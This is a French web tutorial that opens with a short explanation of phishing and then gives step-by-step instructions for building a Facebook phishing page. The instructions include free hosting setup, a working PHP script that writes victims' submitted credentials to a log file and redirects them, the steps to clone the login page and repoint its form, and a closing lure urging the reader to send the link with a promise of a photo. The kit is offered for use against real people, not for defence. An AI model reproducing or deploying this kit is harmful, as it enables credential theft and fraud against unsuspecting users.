Introduction au phishing


Le phishing (contraction des mots anglais « fishing », en français pêche, et «phreaking », désignant le piratage de lignes téléphoniques), traduit parfois en «hameçonnage », est une technique frauduleuse utilisée par les pirates informatiques pour récupérer des informations (généralement bancaires) auprès d'internautes. 

 

La technique du phishing est une technique d'« ingénierie sociale » c'est-à-dire consistant à exploiter non pas une faille informatique mais la « faille humaine » en dupant les internautes par le biais d'un courrier électronique semblant provenir d'une entreprise de confiance, typiquement une banque ou un site de commerce. 

Le mail envoyé par ces pirates usurpe l'identité d'une entreprise (banque, site de commerce électronique, etc.) et les invite à se connecter en ligne par le biais d'un lien hypertexte et de mettre à jour des informations les concernant dans un formulaire d'une page web factice, copie conforme du site original, en prétextant par exemple une mise à jour du service, une intervention du support technique, etc. 

Dans la mesure où les adresses électroniques sont collectées au hasard sur Internet, le message a généralement peu de sens puisque l'internaute n'est pas client de la banque de laquelle le courrier semble provenir. Mais sur la quantité des messages envoyés il arrive que le destinataire soit effectivement client de la banque. 

Ainsi, par le biais du formulaire, les pirates réussissent à obtenir les identifiants et mots de passe des internautes ou bien des données personnelles ou bancaires (numéro de client, numéro de compte en banque, etc.). 

Grâce à ces données les pirates sont capables de transférer directement l'argent sur un autre compte ou bien d'obtenir ultérieurement les données nécessaires en utilisant intelligemment les données personnelles ainsi collectées



Comment créer une page de phishing ?


  •  Pour commencer, créez vous un compte sur un hébergeur FTP (ex: http://www.000webhost.com/). Une fois sur le site, dans la colonne "FREE HOSTING". Click sur le premier "order now". Ensuite remplissez toutes les cases qui se trouvent après. Une fois le compte créé et activé, allez dans " Go to CPanel" puis dans "View ftp details" qui se trouve dans ''files''. Laissez la page ouverte, on se servira des informations FTP dans le point 2.

 

  •  Téléchargez le logiciel FileZilla ici : Download. Installez-le puis dans le logiciel, entrez vos informations FTP dans Hôte-Identifiant-Mot de passe et click sur connexion rapide.

 

  •  On va créer le fichier .php qui servira a récupérer les logs de vos victimes.



Créez un nouveau document texte. Dedans mettez-y ca :

 


<?php
header (' Location: http://www.google.fr '); //le site ou sera redirigée la victime
$handle = fopen("logs.txt", "a"); //le fichier texte ou seront les logs des victimes
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


  • Allez dans enregistrer sous, mettez le nom que vous voulez (ex: hack.php) mettez bien le .php puis à la place de ''Fichiers Textes (*.txt)'' mettez ''tout les fichiers''.


  • Ensuite allez sur la page d'identification du site (ex: http://fr-fr.facebook.com/) Faites un clique droit sur la page puis afficher le code source. Une fois dans le code source, faites enregistrer sous.(mettez le fichier ou vous voulez) Sur votre ordinateur,ouvrez le code source que vous venez d'enregistrer avec le bloc note.

(Il est néanmoins fortement conseillé des logiciels comme HTTrack, cela evite plusieurs bugs)


  • Allez dans >edition, >recherche et mettez "action". Vous trouverez action="quelquechose" modifiez ce qu' il y a d'écrit entre guillemet et mettez "hack.php" (le nom de votre fichier .php). Continuez la recherche avec action et faites ca partout ou il y aura écrit action. Allez dans enregistrez sous, mettez Index.html et mettez "Tous les fichiers" (index.html est obligatoire sinon le site ne fonctionnera pas).


  • Allez dans Filezilla, (vous êtes normalement toujours connectez, si ce n'est pas le cas, connectez vous à l'aide des informations FTP comme vu dans le point 2) en bas a droite il y a 3 fichiers, "DO_NOT_UPLOAD_HERE, public_html et .ftpquota . On ne s'occupe que de public_html, double clickez dessus. Dedans il y a deux fichiers, supprimez-les. Mettez vos fichiers hack.php et index.html.

Voilà envoyez votre lien piègé et dîtes à la personne de se connecter pour voir la photo !



comments powered by Disqus